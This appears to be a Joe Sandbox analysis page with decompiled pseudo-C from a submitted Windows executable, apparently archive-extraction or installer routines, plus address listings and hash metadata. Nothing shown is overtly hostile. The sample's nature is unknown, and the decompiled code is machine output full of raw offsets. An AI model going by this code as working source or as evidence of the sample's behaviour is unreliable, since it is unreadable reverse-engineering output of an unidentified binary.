								_t308 = E0040C73A(_t408, _t503, 0, _t307, _t173,  *(_t510 + 0x18),  *((intOrPtr*)(_t510 - 0x4c)),  *(_t510 + 8) & 0xffffff00 |  *( *(_t510 + 8) + 0x1e0) != 0x00000000); // executed
								__eflags = _t308;
								 *(_t510 + 0xc) = _t308;
								if(_t308 == 0) {
									__eflags =  *_t490 - 0xffffffff;
									if( *_t490 == 0xffffffff) {
										_t492 =  *(_t490 + 4) << 2;
										 *(_t510 + 0xc) =  *( *((intOrPtr*)(_t503 + 0x48)) + _t492);
										 *(_t510 - 0x48) = E0040C2CD(_t503,  *(_t490 + 4));
										 *(_t510 - 0x44) = _t485;
										 *(_t510 - 4) = 0xe;
										_t485 =  *( *((intOrPtr*)(_t503 + 0x17c)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3) + 4);
										asm("adc edx, [esi+0x14c]");
										_t314 = E0040AD19(_t510 - 0x108, __eflags,  *((intOrPtr*)( *(_t510 + 8) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x17c)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3))) +  *((intOrPtr*)(_t503 + 0x148)), _t485,  *((intOrPtr*)(_t503 + 0xc)) + ( *( *((intOrPtr*)(_t503 + 0x190)) + _t492) << 3),  *(_t510 + 0xc),  *(_t510 + 0x10),  *(_t510 - 0x14)); // executed
										_t506 = _t314;
										__eflags = _t506 - 1;
										if(_t506 != 1) {
											__eflags = _t506 - 0x80004001;
											if(_t506 != 0x80004001) {
												__eflags = _t506;
												if(_t506 == 0) {
													_t315 =  *((intOrPtr*)(_t408 + 0x18));
													__eflags =  *((intOrPtr*)(_t408 + 0x28)) -  *((intOrPtr*)(_t315 + 8));
													if( *((intOrPtr*)(_t408 + 0x28)) ==  *((intOrPtr*)(_t315 + 8))) {
														 *(_t510 - 4) = 9;
														E00403800(_t510 + 0x10);
														L91:
														 *(_t510 + 0x14) =  *(_t510 + 0x14) + 1;
														 *(_t510 - 0x1c) =  *(_t510 - 0x1c) +  *((intOrPtr*)(_t510 - 0x54));
														_t488 =  *(_t510 - 0x38);
														_t502 =  *(_t510 + 0x14);
														asm("adc [ebp-0x18], eax");
														 *(_t510 - 0x40) =  *(_t510 - 0x40) +  *(_t510 - 0x48);
														asm("adc [ebp-0x3c], eax");
														_t407 = 0;
														continue;
													}
													_t506 = E0040CA4C(_t408, _t510, 2);
													_t323 =  *(_t510 + 0x10);
													__eflags = _t506;
													 *(_t510 - 4) = 9;
													if(_t506 == 0) {
														L86:
														__eflags = _t323;
														if(_t323 != 0) {
															 *((intOrPtr*)( *_t323 + 8))(_t323);
														}
														 *(_t510 - 4) = 9;
														goto L91;
													}
													__eflags = _t323;
													if(_t323 != 0) {
														 *((intOrPtr*)( *_t323 + 8))(_t323);
													}
													_t325 =  *(_t510 - 0x14);
													 *(_t510 - 4) = 7;
													__eflags = _t325;
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t325 + 8))(_t325);
													}
													 *(_t510 - 4) = 2;
													E0040C380(_t510 - 0x108, __eflags);
													 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
													 *(_t510 - 4) = 0x12;
													L82:
													E004042D6();
													 *(_t510 - 4) = 1;
													E004042AD(_t510 - 0x30);
													_t329 =  *(_t510 + 0x18);
													 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
													__eflags = _t329;
													L83:
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t329 + 8))(_t329);
													}
													_t330 = _t506;
													goto L92;
												}
												_t334 =  *(_t510 + 0x10);
												 *(_t510 - 4) = 9;
												__eflags = _t334;
												if(_t334 != 0) {
													 *((intOrPtr*)( *_t334 + 8))(_t334);
												}
												_t335 =  *(_t510 - 0x14);
												 *(_t510 - 4) = 7;
												__eflags = _t335;
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t335 + 8))(_t335);
												}
												 *(_t510 - 4) = 2;
												E0040C380(_t510 - 0x108, __eflags);
												 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
												 *(_t510 - 4) = 0x11;
												goto L82;
											}
											_t506 = E0040CA4C(_t408, _t510, 1);
											_t323 =  *(_t510 + 0x10);
											__eflags = _t506;
											 *(_t510 - 4) = 9;
											if(_t506 == 0) {
												goto L86;
											}
											__eflags = _t323;
											if(_t323 != 0) {
												 *((intOrPtr*)( *_t323 + 8))(_t323);
											}
											_t340 =  *(_t510 - 0x14);
											 *(_t510 - 4) = 7;
											__eflags = _t340;
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t340 + 8))(_t340);
											}
											 *(_t510 - 4) = 2;
											E0040C380(_t510 - 0x108, __eflags);
											 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
											 *(_t510 - 4) = 0x10;
											goto L82;
										}
										_t506 = E0040CA4C(_t408, _t510, 2);
										_t323 =  *(_t510 + 0x10);
										__eflags = _t506;
										 *(_t510 - 4) = 9;
										if(_t506 == 0) {
											goto L86;
										}
										__eflags = _t323;
										if(_t323 != 0) {
											 *((intOrPtr*)( *_t323 + 8))(_t323);
										}
										_t345 =  *(_t510 - 0x14);
										 *(_t510 - 4) = 7;
										__eflags = _t345;
										if(__eflags != 0) {
											 *((intOrPtr*)( *_t345 + 8))(_t345);
										}
										 *(_t510 - 4) = 2;
										E0040C380(_t510 - 0x108, __eflags);
										 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
										 *(_t510 - 4) = 0xf;
										goto L82;
									}
									_t349 =  *(_t510 + 0x10);
									 *(_t510 - 4) = 9;
									__eflags = _t349;
									if(_t349 != 0) {
										 *((intOrPtr*)( *_t349 + 8))(_t349);
									}
									goto L91;
								} else {
									_t351 =  *(_t510 + 0x10);
									 *(_t510 - 4) = 9;
									__eflags = _t351;
									if(_t351 != 0) {
										 *((intOrPtr*)( *_t351 + 8))(_t351);
									}
									_t352 =  *(_t510 - 0x14);
									 *(_t510 - 4) = 7;
									__eflags = _t352;
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t352 + 8))(_t352);
									}
									 *(_t510 - 4) = 2;
									E0040C380(_t510 - 0x108, __eflags);
									 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
									 *(_t510 - 4) = 0xd;
									E004042D6();
									 *(_t510 - 4) = 1;
									E004042AD(_t510 - 0x30);
									_t356 =  *(_t510 + 0x18);
									 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
									__eflags = _t356;
									if(_t356 != 0) {
										 *((intOrPtr*)( *_t356 + 8))(_t356);
									}
									_t330 =  *(_t510 + 0xc);
									goto L92;
								}
							}
							 *(_t510 - 4) = 7;
							E00403800(_t510 - 0x14);
							 *(_t510 - 4) = 2;
							E0040C380(_t510 - 0x108, __eflags); // executed
							 *(_t510 - 4) = 1;
							E0040C435(_t510 - 0x30);
							_t144 = _t510 - 4;
							 *_t144 =  *(_t510 - 4) & 0x00000000;
							__eflags =  *_t144;
							E00403800(_t510 + 0x18);
							goto L36;
						}
						_t368 =  *(_t510 - 0x14);
						 *(_t510 - 4) = 7;
						__eflags = _t368 - _t407;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t368 + 8))(_t368);
						}
						 *(_t510 - 4) = 2;
						E0040C380(_t510 - 0x108, __eflags);
						 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
						 *(_t510 - 4) = 0xa;
						E004042D6();
						 *(_t510 - 4) = 1;
						E004042AD(_t510 - 0x30);
						_t372 =  *(_t510 + 0x18);
						 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
						__eflags = _t372 - _t407;
						if(_t372 != _t407) {
							 *((intOrPtr*)( *_t372 + 8))(_t372);
						}
						_t330 = _t489;
						goto L92;
					}
					 *((intOrPtr*)(_t510 - 0x30)) = 0x41b740;
					 *(_t510 - 4) = 6;
					E004042D6();
					 *(_t510 - 4) = 1;
					E004042AD(_t510 - 0x30);
					_t329 =  *(_t510 + 0x18);
					 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
					__eflags = _t329 - _t407;
					goto L83;
				} else {
					_t401 =  *(_t510 + 0x18);
					 *(_t510 - 4) =  *(_t510 - 4) & 0x00000000;
					if(_t401 != _t407) {
						 *((intOrPtr*)( *_t401 + 8))(_t401);
					}
					L36:
					_t330 = 0;
					L92:
					 *[fs:0x0] =  *((intOrPtr*)(_t510 - 0xc));
					return _t330;
				}
			}

















































                              0x0040bbc9
                              0x0040bbce
                              0x0040bbda
                              0x0040bbe1
                              0x0040bbe7
                              0x0040bbea
                              0x0040bbef
                              0x0040bbf2
                              0x0040bbf5
                              0x0040bbfa
                              0x0040bbfa
                              0x0040bc01
                              0x0040bc05
                              0x0040bc08
                              0x0040bc0b
                              0x0040bc13
                              0x0040bc1b
                              0x0040bc1b
                              0x0040bc21
                              0x0040bc40
                              0x0040bc45
                              0x0040bc4c
                              0x0040bc4c
                              0x0040bc4e
                              0x0040bc52
                              0x0040bc55
                              0x0040bc55
                              0x0040bc58
                              0x00000000
                              0x00000000
                              0x0040bc5e
                              0x0040bc62
                              0x0040bc67
                              0x0040bc67
                              0x0040bc6a
                              0x0040bc6d
                              0x0040bc76
                              0x0040bc79
                              0x0040bc7c
                              0x0040bcb2
                              0x0040bcb5
                              0x0040bcb7
                              0x0040bcc5
                              0x0040bcc5
                              0x0040bccc
                              0x0040bccf
                              0x0040bcd4
                              0x0040bcd7
                              0x0040bce0
                              0x0040bce1
                              0x0040bce5
                              0x0040bced
                              0x0040bcf1
                              0x0040bd04
                              0x0040bd09
                              0x0040bd09
                              0x0040bd09
                              0x0040bd0c
                              0x0040bd10
                              0x0040bd13
                              0x0040bd16
                              0x0040bd19
                              0x0040bd1f
                              0x0040bd2c
                              0x0040bd2f
                              0x0040bd32
                              0x0040bd35
                              0x0040bd37
                              0x0040bd39
                              0x00000000
                              0x00000000
                              0x0040bd43
                              0x0040bd46
                              0x0040bd4b
                              0x0040bd4b
                              0x00000000
                              0x0040bd32
                              0x0040bcbc
                              0x0040bcc0
                              0x0040bcc3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040bc7e
                              0x0040bc7e
                              0x0040bc7f
                              0x0040bc8b
                              0x0040bc8f
                              0x0040bc93
                              0x0040bc9e
                              0x0040bca2
                              0x0040bca7
                              0x0040bcaa
                              0x0040bcab
                              0x0040bcad
                              0x00000000
                              0x0040bcad
                              0x0040bc7c
                              0x0040bd51
                              0x0040bd5f
                              0x0040bd61
                              0x0040bd98
                              0x0040bd9d
                              0x0040bd9f
                              0x0040bda3
                              0x0040bda6
                              0x0040bda9
                              0x0040bdac
                              0x0040bdaf
                              0x0040bdb5
                              0x0040bdb8
                              0x0040bdba
                              0x0040bdbe
                              0x0040bdcb
                              0x0040bdcb
                              0x0040bdc0
                              0x0040bdc7
                              0x0040bdc7
                              0x0040bdcd
                              0x0040bdcf
                              0x0040bdd1
                              0x0040bdd5
                              0x0040bdd8
                              0x0040bddb
                              0x0040bde0
                              0x0040bde0
                              0x0040bde3
                              0x0040bde9
                              0x0040bded
                              0x0040bdf2
                              0x0040bdf2
                              0x0040bdf4
                              0x0040bdf7
                              0x0040bdfc
                              0x0040be02
                              0x0040be08
                              0x0040be0e
                              0x0040be16
                              0x0040be18
                              0x0040be1a
                              0x00000000
                              0x00000000
                              0x0040be73
                              0x0040be76
                              0x0040beb5
                              0x0040beb7
                              0x0040beba
                              0x0040bebd
                              0x0040bec3
                              0x0040bec9
                              0x0040becc
                              0x0040bed2
                              0x0040bed5
                              0x0040bed7
                              0x0040bedb
                              0x0040bee8
                              0x0040bee8
                              0x0040bedd
                              0x0040bee4
                              0x0040bee4
                              0x0040beea
                              0x0040beec
                              0x0040beef
                              0x0040bef3
                              0x0040bef6
                              0x0040befb
                              0x0040befb
                              0x0040bf01
                              0x0040bf05
                              0x0040bf08
                              0x0040bf0a
                              0x0040bf0d
                              0x0040bf18
                              0x0040bf18
                              0x0040bf1e
                              0x0040bf29
                              0x0040bf39
                              0x0040bf3e
                              0x0040bf40
                              0x0040bf43
                              0x0040bfae
                              0x0040bfb1
                              0x0040bfd6
                              0x0040bfdc
                              0x0040bfe6
                              0x0040bff2
                              0x0040c010
                              0x0040c01a
                              0x0040c01e
                              0x0040c033
                              0x0040c038
                              0x0040c03a
                              0x0040c03d
                              0x0040c093
                              0x0040c099
                              0x0040c0ef
                              0x0040c0f1
                              0x0040c131
                              0x0040c137
                              0x0040c13a
                              0x0040c1c7
                              0x0040c238
                              0x0040c23d
                              0x0040c240
                              0x0040c243
                              0x0040c249
                              0x0040c24c
                              0x0040c24f
                              0x0040c255
                              0x0040c25b
                              0x0040c25e
                              0x00000000
                              0x0040c25e
                              0x0040c149
                              0x0040c14b
                              0x0040c14e
                              0x0040c150
                              0x0040c154
                              0x0040c1b7
                              0x0040c1b7
                              0x0040c1b9
                              0x0040c1be
                              0x0040c1be
                              0x0040c1c1
                              0x00000000
                              0x0040c1c1
                              0x0040c156
                              0x0040c158
                              0x0040c15d
                              0x0040c15d
                              0x0040c160
                              0x0040c163
                              0x0040c167
                              0x0040c169
                              0x0040c16e
                              0x0040c16e
                              0x0040c177
                              0x0040c17b
                              0x0040c180
                              0x0040c187
                              0x0040c18b
                              0x0040c18e
                              0x0040c196
                              0x0040c19a
                              0x0040c19f
                              0x0040c1a2
                              0x0040c1a6
                              0x0040c1a8
                              0x0040c1a8
                              0x0040c1ad
                              0x0040c1ad
                              0x0040c1b0
                              0x00000000
                              0x0040c1b0
                              0x0040c0f3
                              0x0040c0f6
                              0x0040c0fa
                              0x0040c0fc
                              0x0040c101
                              0x0040c101
                              0x0040c104
                              0x0040c107
                              0x0040c10b
                              0x0040c10d
                              0x0040c112
                              0x0040c112
                              0x0040c11b
                              0x0040c11f
                              0x0040c124
                              0x0040c12b
                              0x00000000
                              0x0040c12b
                              0x0040c0a4
                              0x0040c0a6
                              0x0040c0a9
                              0x0040c0ab
                              0x0040c0af
                              0x00000000
                              0x00000000
                              0x0040c0b5
                              0x0040c0b7
                              0x0040c0bc
                              0x0040c0bc
                              0x0040c0bf
                              0x0040c0c2
                              0x0040c0c6
                              0x0040c0c8
                              0x0040c0cd
                              0x0040c0cd
                              0x0040c0d6
                              0x0040c0da
                              0x0040c0df
                              0x0040c0e6
                              0x00000000
                              0x0040c0e6
                              0x0040c048
                              0x0040c04a
                              0x0040c04d
                              0x0040c04f
                              0x0040c053
                              0x00000000
                              0x00000000
                              0x0040c059
                              0x0040c05b
                              0x0040c060
                              0x0040c060
                              0x0040c063
                              0x0040c066
                              0x0040c06a
                              0x0040c06c
                              0x0040c071
                              0x0040c071
                              0x0040c07a
                              0x0040c07e
                              0x0040c083
                              0x0040c08a
                              0x00000000
                              0x0040c08a
                              0x0040bfb3
                              0x0040bfb6
                              0x0040bfba
                              0x0040bfbc
                              0x0040bfc5
                              0x0040bfc5
                              0x00000000
                              0x0040bf45
                              0x0040bf45
                              0x0040bf48
                              0x0040bf4c
                              0x0040bf4e
                              0x0040bf53
                              0x0040bf53
                              0x0040bf56
                              0x0040bf59
                              0x0040bf5d
                              0x0040bf5f
                              0x0040bf64
                              0x0040bf64
                              0x0040bf6d
                              0x0040bf71
                              0x0040bf76
                              0x0040bf80
                              0x0040bf84
                              0x0040bf8c
                              0x0040bf90
                              0x0040bf95
                              0x0040bf98
                              0x0040bf9c
                              0x0040bf9e
                              0x0040bfa3
                              0x0040bfa3
                              0x0040bfa6
                              0x00000000
                              0x0040bfa6
                              0x0040bf43
                              0x0040be7b
                              0x0040be7f
                              0x0040be8a
                              0x0040be8e
                              0x0040be96
                              0x0040be9a
                              0x0040be9f
                              0x0040be9f
                              0x0040be9f
                              0x0040bea6
                              0x00000000
                              0x0040bea6
                              0x0040be1c
                              0x0040be1f
                              0x0040be23
                              0x0040be25
                              0x0040be2a
                              0x0040be2a
                              0x0040be33
                              0x0040be37
                              0x0040be3c
                              0x0040be46
                              0x0040be4a
                              0x0040be52
                              0x0040be56
                              0x0040be5b
                              0x0040be5e
                              0x0040be62
                              0x0040be64
                              0x0040be69
                              0x0040be69
                              0x0040be6c
                              0x00000000
                              0x0040be6c
                              0x0040bd63
                              0x0040bd6d
                              0x0040bd71
                              0x0040bd79
                              0x0040bd7d
                              0x0040bd82
                              0x0040bd85
                              0x0040bd89
                              0x00000000
                              0x0040bc23
                              0x0040bc23
                              0x0040bc26
                              0x0040bc2c
                              0x0040bc35
                              0x0040bc35
                              0x0040beab
                              0x0040beab
                              0x0040c270
                              0x0040c275
                              0x0040c27e
                              0x0040c27e

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
                              • Instruction ID: 754c2283aee26f26976a66738bb4ef570e525f81dc1fbbef9a6f78583ad2e2a8
                              • Opcode Fuzzy Hash: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
                              • Instruction Fuzzy Hash: 5B325D70904249DFDB10DFA8C584ADEBBB4AF58304F1441AEE855BB3C2CB78AE45CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040280D Relevance: 1.9, APIs: 1, Instructions: 384COMMON
                              Download Yara Rule
                              C-Code - Quality: 94%
                              			E0040280D() {
				void* __ebx;
				intOrPtr* _t185;
				intOrPtr* _t186;
				signed int _t187;
				signed int _t195;
				intOrPtr* _t196;
				signed int _t197;
				intOrPtr _t198;
				intOrPtr* _t199;
				intOrPtr* _t204;
				intOrPtr* _t207;
				signed int _t208;
				signed int _t209;
				FILETIME* _t217;
				signed int _t226;
				signed int _t227;
				FILETIME* _t228;
				FILETIME* _t244;
				signed int _t270;
				intOrPtr _t289;
				WCHAR* _t315;
				signed int _t338;
				signed int _t340;
				signed int _t342;
				intOrPtr _t344;
				intOrPtr* _t346;
				signed int _t347;
				void* _t348;

				E00413954(E0041921B, _t348);
				_t344 =  *((intOrPtr*)(_t348 + 8));
				if(E00402D80(_t344 + 0xa8) == 0) {
					_t185 =  *((intOrPtr*)(_t344 + 0x4c));
					_t270 = 0;
					__eflags = _t185;
					if(_t185 != 0) {
						 *((intOrPtr*)( *_t185 + 8))(_t185);
						 *((intOrPtr*)(_t344 + 0x4c)) = 0;
					}
					 *(_t348 - 0x58) = _t270;
					 *(_t348 - 0x56) = _t270;
					_t186 =  *((intOrPtr*)(_t344 + 0xc));
					_t338 =  *(_t348 + 0xc);
					 *(_t348 - 4) = _t270;
					_t187 =  *((intOrPtr*)( *_t186 + 0x18))(_t186, _t338, 3, _t348 - 0x58);
					__eflags = _t187 - _t270;
					if(_t187 == _t270) {
						 *(_t348 - 0x18) = _t270;
						 *(_t348 - 0x14) = _t270;
						 *(_t348 - 0x10) = _t270;
						E00402170(_t348 - 0x18, 3);
						__eflags =  *(_t348 - 0x58) - _t270;
						 *(_t348 - 4) = 1;
						if( *(_t348 - 0x58) != _t270) {
							__eflags =  *(_t348 - 0x58) - 8;
							if( *(_t348 - 0x58) == 8) {
								E00401D1B(_t348 - 0x18,  *((intOrPtr*)(_t348 - 0x50)));
								L12:
								E00401D7A(_t344 + 0x1c, _t348 - 0x18);
								__eflags =  *((intOrPtr*)(_t348 + 0x14)) - _t270;
								if( *((intOrPtr*)(_t348 + 0x14)) != _t270) {
									 *( *(_t348 + 0x10)) = _t270;
									L61:
									E00403A9C( *(_t348 - 0x18));
									 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
									E00405E34(_t348 - 0x58);
									_t195 = 0;
									__eflags = 0;
									goto L62;
								}
								 *(_t348 - 0x28) = _t270;
								 *(_t348 - 0x26) = _t270;
								_t196 =  *((intOrPtr*)(_t344 + 0xc));
								 *(_t348 - 4) = 2;
								_t197 =  *((intOrPtr*)( *_t196 + 0x18))(_t196, _t338, 9, _t348 - 0x28);
								__eflags = _t197 - _t270;
								if(_t197 == _t270) {
									__eflags =  *(_t348 - 0x28) - _t270;
									if( *(_t348 - 0x28) != _t270) {
										__eflags =  *(_t348 - 0x28) - 0x13;
										if( *(_t348 - 0x28) == 0x13) {
											_t198 =  *((intOrPtr*)(_t348 - 0x20));
											L20:
											 *((intOrPtr*)(_t344 + 0x44)) = _t198;
											_t199 =  *((intOrPtr*)(_t344 + 0xc));
											_t197 =  *((intOrPtr*)( *_t199 + 0x18))(_t199, _t338, 6, _t348 - 0x28);
											__eflags = _t197 - _t270;
											if(_t197 != _t270) {
												goto L14;
											}
											__eflags =  *((intOrPtr*)(_t348 - 0x20)) - _t270;
											 *(_t348 + 0xb) = _t270;
											 *(_t348 - 0x74) = _t270;
											 *(_t348 - 0x72) = _t270;
											 *((char*)(_t344 + 0x40)) = _t197 & 0xffffff00 |  *((intOrPtr*)(_t348 - 0x20)) != _t270;
											_t204 =  *((intOrPtr*)(_t344 + 0xc));
											 *(_t348 - 4) = 3;
											_t340 =  *((intOrPtr*)( *_t204 + 0x18))(_t204, _t338, 0x15, _t348 - 0x74);
											__eflags = _t340 - _t270;
											if(_t340 == _t270) {
												__eflags =  *(_t348 - 0x74) - 0xb;
												if( *(_t348 - 0x74) == 0xb) {
													__eflags =  *((intOrPtr*)(_t348 - 0x6c)) - _t270;
													_t66 = _t348 + 0xb;
													 *_t66 =  *((intOrPtr*)(_t348 - 0x6c)) != _t270;
													__eflags =  *_t66;
												}
												 *(_t348 - 4) = 2;
												E00405E34(_t348 - 0x74);
												_t207 =  *((intOrPtr*)(_t344 + 0xc));
												_t197 =  *((intOrPtr*)( *_t207 + 0x18))(_t207,  *(_t348 + 0xc), 0xc, _t348 - 0x28);
												__eflags = _t197 - _t270;
												if(_t197 != _t270) {
													goto L14;
												} else {
													_t208 =  *(_t348 - 0x28) & 0x0000ffff;
													__eflags = _t208 - _t270;
													if(_t208 == _t270) {
														_t209 = _t344 + 0x38;
														 *(_t348 + 0xc) = _t209;
														 *_t209 =  *((intOrPtr*)(_t344 + 0x5c));
														_t289 =  *((intOrPtr*)(_t344 + 0x60));
														L30:
														 *((intOrPtr*)(_t209 + 4)) = _t289;
														E00402155(_t348 - 0x3c);
														_t341 = 0x41b370;
														 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
														 *(_t348 - 4) = 4;
														E004044BC(_t348 - 0x18, _t348 - 0x3c, __eflags);
														__eflags =  *((intOrPtr*)(_t348 - 0x34)) - _t270;
														if( *((intOrPtr*)(_t348 - 0x34)) != _t270) {
															E00401CE1(_t348 - 0x64, _t348 - 0x18);
															__eflags =  *((intOrPtr*)(_t344 + 0x40)) - _t270;
															 *(_t348 - 4) = 6;
															if( *((intOrPtr*)(_t344 + 0x40)) == _t270) {
																E004042DE(_t348 - 0x3c);
															}
															__eflags =  *((intOrPtr*)(_t348 - 0x34)) - _t270;
															if( *((intOrPtr*)(_t348 - 0x34)) != _t270) {
																__eflags =  *(_t348 + 0xb) - _t270;
																if( *(_t348 + 0xb) == _t270) {
																	_push(_t348 - 0x3c); // executed
																	E004027A6(_t344); // executed
																}
															}
															_t335 = _t344 + 0x10;
															_push(_t348 - 0x64);
															E00402634(_t348 - 0x48, _t344 + 0x10);
															__eflags =  *((intOrPtr*)(_t344 + 0x40)) - _t270;
															 *(_t348 - 4) = 7;
															if( *((intOrPtr*)(_t344 + 0x40)) == _t270) {
																E00402EE1(_t348 - 0x84);
																_push( *((intOrPtr*)(_t348 - 0x48)));
																 *(_t348 - 4) = 9;
																_t217 = E00405841(_t348 - 0xac, _t335); // executed
																__eflags = _t217;
																if(_t217 == 0) {
																	L48:
																	__eflags =  *(_t348 + 0xb) - _t270;
																	if( *(_t348 + 0xb) != _t270) {
																		L59:
																		E00401D7A(_t344 + 0x28, _t348 - 0x48);
																		E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
																		E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
																		E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
																		 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
																		 *(_t348 - 4) = 0xd;
																		E004042D6();
																		 *(_t348 - 4) = 2;
																		E004042AD(_t348 - 0x3c);
																		 *(_t348 - 4) = 1;
																		E00405E34(_t348 - 0x28);
																		goto L61;
																	}
																	_push(0x18);
																	_t226 = E00403A76();
																	__eflags = _t226 - _t270;
																	if(_t226 == _t270) {
																		_t342 = 0;
																		__eflags = 0;
																	} else {
																		 *(_t226 + 4) = _t270;
																		 *(_t226 + 8) =  *(_t226 + 8) | 0xffffffff;
																		 *_t226 = 0x41b354;
																		_t342 = _t226;
																	}
																	__eflags = _t342 - _t270;
																	 *(_t344 + 0x48) = _t342;
																	 *(_t348 + 0xc) = _t342;
																	if(_t342 != _t270) {
																		 *((intOrPtr*)( *_t342 + 4))(_t342);
																	}
																	_t227 =  *(_t344 + 0x48);
																	 *(_t227 + 0x10) = _t270;
																	 *(_t348 - 4) = 0xb;
																	 *(_t227 + 0x14) = _t270;
																	_t228 = E00405C43( *((intOrPtr*)(_t348 - 0x48)), 1);
																	__eflags = _t228;
																	if(_t228 != 0) {
																		E0040640D(_t344 + 0x4c, _t342);
																		 *(_t348 - 4) = 9;
																		 *( *(_t348 + 0x10)) = _t342;
																		_t341 = 0x41b370;
																		goto L59;
																	} else {
																		E00401D1B(_t344 + 0xe4,  *0x420280);
																		__eflags = _t342 - _t270;
																		 *(_t348 - 4) = 9;
																		if(_t342 != _t270) {
																			 *((intOrPtr*)( *_t342 + 8))(_t342);
																		}
																		E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
																		E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
																		E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
																		 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
																		 *(_t348 - 4) = 0xc;
																		E004042D6();
																		 *(_t348 - 4) = 2;
																		E004042AD(_t348 - 0x3c);
																		 *(_t348 - 4) = 1;
																		E00405E34(_t348 - 0x28);
																		E00403A9C( *(_t348 - 0x18));
																		 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
																		E00405E34(_t348 - 0x58);
																		_t195 = 0x80004005;
																		goto L62;
																	}
																}
																_t244 = E00404BFA(_t270,  *((intOrPtr*)(_t348 - 0x48)));
																__eflags = _t244;
																if(_t244 != 0) {
																	goto L48;
																}
																E00401D1B(_t344 + 0xe4,  *0x42027c);
																E00403A9C( *((intOrPtr*)(_t348 - 0x84)));
																E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
																E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
																 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
																 *(_t348 - 4) = 0xa;
																L45:
																_t270 = 0x80004005;
																goto L46;
															} else {
																_t346 = _t344 + 0x28;
																E00401D7A(_t346, _t348 - 0x48);
																__eflags =  *(_t348 + 0xb) - _t270;
																_t315 =  *_t346;
																if( *(_t348 + 0xb) == _t270) {
																	__eflags = 0;
																	E0040483F(_t315, 0, _t270,  *(_t348 + 0xc));
																} else {
																	E0040494E(_t315);
																}
																E00403A9C( *((intOrPtr*)(_t348 - 0x48)));
																E00403A9C( *((intOrPtr*)(_t348 - 0x64)));
																 *((intOrPtr*)(_t348 - 0x3c)) = _t341;
																 *(_t348 - 4) = 8;
																L46:
																E004042D6();
																 *(_t348 - 4) = 2;
																E004042AD(_t348 - 0x3c);
																L47:
																 *(_t348 - 4) = 1;
																E00405E34(_t348 - 0x28);
																E00403A9C( *(_t348 - 0x18));
																 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
																E00405E34(_t348 - 0x58);
																_t195 = _t270;
																goto L62;
															}
														}
														 *((intOrPtr*)(_t348 - 0x3c)) = 0x41b370;
														 *(_t348 - 4) = 5;
														goto L45;
													}
													__eflags = _t208 - 0x40;
													if(_t208 != 0x40) {
														goto L18;
													}
													_t209 = _t344 + 0x38;
													 *(_t348 + 0xc) = _t209;
													 *_t209 =  *((intOrPtr*)(_t348 - 0x20));
													_t289 =  *((intOrPtr*)(_t348 - 0x1c));
													goto L30;
												}
											}
											 *(_t348 - 4) = 2;
											E00405E34(_t348 - 0x74);
											 *(_t348 - 4) = 1;
											E00405E34(_t348 - 0x28);
											E00403A9C( *(_t348 - 0x18));
											 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
											E00405E34(_t348 - 0x58);
											_t195 = _t340;
											goto L62;
										}
										L18:
										_t270 = 0x80004005;
										goto L47;
									}
									_t198 =  *((intOrPtr*)(_t344 + 0x64));
									goto L20;
								}
								L14:
								_t270 = _t197;
								goto L47;
							}
							E00403A9C( *(_t348 - 0x18));
							_t347 = 0x80004005;
							goto L10;
						}
						E00401D7A(_t348 - 0x18, _t344 + 0x50);
						goto L12;
					} else {
						_t347 = _t187;
						L10:
						 *(_t348 - 4) =  *(_t348 - 4) | 0xffffffff;
						E00405E34(_t348 - 0x58);
						_t195 = _t347;
						L62:
